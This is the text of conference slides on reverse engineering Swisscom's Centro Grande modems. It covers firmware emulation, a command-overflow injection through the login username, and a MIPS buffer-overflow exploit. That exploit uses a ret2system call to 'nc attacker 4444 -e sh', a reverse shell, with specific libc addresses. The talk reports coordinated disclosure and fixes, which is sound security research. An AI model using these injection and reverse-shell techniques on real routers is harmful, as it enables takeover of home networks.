A Secure and Reliable Document Management System is Essential.docx
Reverse engineering Swisscom's Centro Grande Modem
1. Reverse engineering Swisscom’sReverse engineering Swisscom’s
Centro Grande modemsCentro Grande modems
Alain Mowat & Thomas ImbertAlain Mowat & Thomas Imbert
2. 2whoami
› Alain Mowat (@plopz0r)
› Head of Audit division at SCRT
› Pentest
› Code review
› Trainings
› Mostly a Web App guy
› Member of 0daysober CTF team
› Watch other people exploiting cool vulns
3. 3Background
› Why look into the Swisscom modems?
› Why this talk?
› I don’t actually own a Swisscom modem
› Made it a bit harder to study...
5. 5Attack Surface
› ADB# show processes
256 0 2040 S logd
259 0 1308 S klogd -c3
271 0 832 S ec
343 0 3236 S cm
350 0 0 SW [dsl0]
363 0 0 SW [bcmsw]
364 0 0 SW [bcmsw_timer]
365 0 0 SW< [linkwatch]
5889 0 1132 S dropbear -P /tmp/dropbear-local.pid -l 20 -p 192.168
6227 0 1312 S telnetd Local -u 20 -b 192.168.1.1:23 -I 300
6898 65534 2292 S nhttpd -c /tmp/nhttpd.conf
7362 0 1000 S dhcps /tmp/dhcps.conf
7910 0 764 S dns
8014 0 1088 S miniupnpd -i ptm0 -a 192.168.1.1 -N -I 4
8026 0 736 S /bin/wpspbc
8223 0 2676 S /usr/sbin/hostapd -B /tmp/wlan/config/hostapd.conf
9164 0 1664 S /bin/sh /etc/rc.common /etc/rc.d/S11services.sh boot
9177 0 2940 S cwmp
9204 0 1316 S /bin/sh /etc/ah/printk_dump.sh
9353 0 884 S ec
9553 0 1312 S /bin/sh /etc/ah/procSentinel.sh cm 300
11846 0 1332 S /bin/sh DHCPv4Client.sh
11848 0 1320 S udhcpc -S -R -f -W rgH7sqo?h@5Y -t 500000 -T 4 -o -C
14753 0 792 S igmpproxy -c /tmp/igmpproxy.conf -p /tmp/igmpproxy.p
15287 0 3576 S voip
15688 0 740 S tproxyd 80 8080 1 192.168.1.1 /ui/swc/parentalcontro
15923 0 1056 S N chronyd -f /tmp/chrony.conf
16770 0 820 S radvd
16812 0 2036 S dibbler-server start
6. 6Finding the firmware
› Locate the firmware
› https://www.swisscom.ch/en/residential/help/device/internet-router/centro-
grande.html
› Vx226x1_61400.sig
› Version at the time
› 6.14.00
8. 8CPE WAN Management Protocol
› Also known as TR-069
› Protocol that defines how to manage « Customer-premises Equipment »
› cwmp binary
› Listens to 0.0.0.0:7547
› iptables rule allows access only from certain Swisscom subnets
9. 9Web interface
› Web server is nhttpd (http://www.nazgul.ch/dev_nostromo.html)
› If a binary file is accessed through the web interface, it executes it
› Directory traversal → Code Exec in version 1.9.3
11. 11Emulating the device
› OpenWRT (https://openwrt.org/)
› Linux distribution for embedded devices
› Qemu (http://wiki.qemu.org/Main_Page)
› Machine emulator and virtualizer
12. 12Configuring OpenWRT
› make menuconfig
› MIPS target
› Add all debugging and networking tools
› Cross-compile nhttpd
› Generate ramdisk
› Copy Swisscom firmware files to the image
› Run image with qemu
› qemu-system-mips -kernel openwrt-malta-be-vmlinux-ini-
tramfs.elf -net tap -net nic -nographic -m 2048
13. 13Setting up the image
› nhttpd server
serverroot /www
serveradmin webmaster@adbglobal.com
servermimes conf/mimes
docroot /www/htdocs
docindex lanhosts
logpid /tmp/logs
user nobody
disablehttp 0
notfound 501
sslport 443
sslcert /etc/certs/server.crt
sslcertkey /etc/certs/server.key
sslcertca /etc/certs/ca.pem
sslcertreq *
serverlisten 0.0.0.0
servername localhost
17. 17Configuration manager
› Used to view and modify the device’s configuration
› Bound to localhost:9034
› Also /tmp/cmctl socket
› Several possible commands
› GETO, GETV, …
› SET, SETM, …
› RESET, REBOOT, ...
› DUMP, EXPORT, ...
21. 21Finalizing the image setup
udhcpc -i br-lan
cm
touch /tmp/cmctl
chmod 777 /tmp/cmctl
nhttpd -c /www/nhttpd.cfg
nc localhost 9034
DOM Device /etc/cm/tr181/dom/
DOM InternetGatewayDevice /etc/cm/tr098/dom/
CONF /etc/cm/conf/
ADD InternetGatewayDevice.WANDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice
ADD InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection
SET Device.IP.Interface.1.IPv4Address.1.X_ADB_TR098Reference
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
SET Device.ManagementServer.X_ADB_ConnectionRequestInterface Device.IP.Interface.1
SET Device.IP.Interface.1.Status Up
SET Device.Ethernet.Link.1.Name br-lan
SET Device.DeviceInfo.SerialNumber 123456
SET Device.IP.Interface.1.X_ADB_Upstream true
SET Device.IP.Interface.1.X_ADB_TR098Reference
InternetGatewayDevice.WANDevice.1.WANConnectionDevice.1.WANIPConnection.1
23. 23Configuration manager
› Special syntax
› Similar to SQL in certain ways
› SELECT =~ GETV
› UPDATE =~ SET
› Conditions
› GETO A.B.C.[Test=1]
› GETO A.B.C.[Test~1]
› GETO A.B.C.[Test!1]
24. 24Vulnerability #1 : Command overflow
› Each call to recv is treated as a new command
› By sending more than 16384 characters, we can craft a new configuration
command
› Logging in to the web interface generates a call to the configuration
manager that looks like this
› GETO Users.User.[Username=ATTACKER_CONTROLLED]
› By providing a long username, we can exceed the 16348 limit and gene-
rate a new request within the configuration manager
› Allows complete control over the device
› Change passwords
› Allow remote access
› ...
29. 29Vulnerability #3 : Buffer overflow(s)
› Buffer overflow when parsing the name of XML files when performing
certain commands (CONF, DOM, …)
› Requirements
› Arbitrarily-named XML file on the device
› file and folder are both limited to 4096 in size
parseFilesinFolder(folder):
char path[4096];
files = scandir(folder)
for file in files:
if file ends with ".xml":
strncat(path,folder,4096)
strncat(path,file,4096)
parseFile(filename)
30. 30Exploit #3 : Creating the XML file
› The PATHSAVE command takes 2 arguments
› An XML filename
› Property that needs to be saved
› PATHSAVE /tmp/test.xml Users.User.1.Password
› Can use this to write an arbitrarily-named file on the device
› Exploit can then be triggered by prepending folder with lots of /
› CONF /////////////////////////////////////[…]/tmp/exploit.xml
31. 31Exploit #3 : Exploiting a MIPS binary
Prologue
Epilogue
32. 32Exploit #3 : Exploiting a MIPS binary
› No ASLR on the device
› No NX
› No canaries
› A version of nc with the -e switch is present on the device
› Try to call system(‘nc attacker 4444 -e sh’)
› Arguments are not passed on the stack though, but in registers
› $a0
› $a1
› …
33. 33Exploit #3 : ret2system
› Quick analysis gives address of system in libUclibc (Centro business) :
› Libuclibc base : 0x2aaf8000
› System is at offset : 0x54610
› Real address : 0x2ab4c610
› Need a gadget in order to get our argument to system in $a0
› Make $a0 point to address in the stack
› $s0 is also under our control
36. 36Disclosure timeline
› 9 September 2015 : Initial disclosure to Swisscom
› 10 September 2015 : Vulnerabilities acknowledged by Swisscom
› 11 September 2015 : Vendor notified (ADB)
› 18 September 2015 : Confirmation of vulns & quick fix available
› 24 September 2015 : Test of quick fix
› 29 September 2015 : Contact with ADB
› October 2015 : Rollout of quick fix to all devices
› January 2016 : Status full fix :
› Centro grande : 100 %
› Centro Business 1.0 : 50 %
› Centro Business 2.0 : 100 %
› 13 June 2016 : Disclure
37. 37Swisscom bounty
› Combination of flaws rewarded with 3’000 CHF
› Donated to the Ligue Vaudoise contre le Cancer
› Swisscom Bug Bounty program is up & running
› Talk is tomorrow afternoon :)
38. 38Conclusions
› Attackers
› Look into other processes on the modem
› miniupnp
› voip
› Embedded devices are found everywhere nowadays
› Huge attack surface
› Less people reversing firmwares than searching for XSS
› Defenders
› Consider 0days in your penetration tests
› Test your defense in depth
› Test your ability to detect breaches